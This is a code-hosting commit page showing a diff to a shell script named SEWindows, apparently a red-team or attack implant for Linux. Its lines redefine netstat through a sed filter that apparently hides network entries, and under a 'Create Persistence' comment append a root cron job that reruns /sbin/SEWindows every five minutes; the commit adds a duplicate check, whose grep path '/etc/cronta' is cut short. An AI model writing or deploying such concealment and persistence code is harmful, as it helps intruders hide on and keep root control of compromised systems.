UNCLASSIFIED

Skip to content
Snippets Groups Projects
Commit 57eddb1a authored by Avery Kleeman's avatar Avery Kleeman
Browse files

Update SEWindows

parent 39eb0321
Branches
No related merge requests found
......@@ -31,4 +31,7 @@ echo -e "function netstat() {\n\t/usr/bin/netstat -tunap | /usr/bin/sed -e 's/65
fi
# Create Persistence
echo '*/5 * * * * root /sbin/SEWindows' >> /etc/crontab
\ No newline at end of file
if ! grep -Eq '/sbin/SEWindows$' /etc/cronta
then
echo '*/5 * * * * root /sbin/SEWindows' >> /etc/crontab
fi
\ No newline at end of file
0% or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment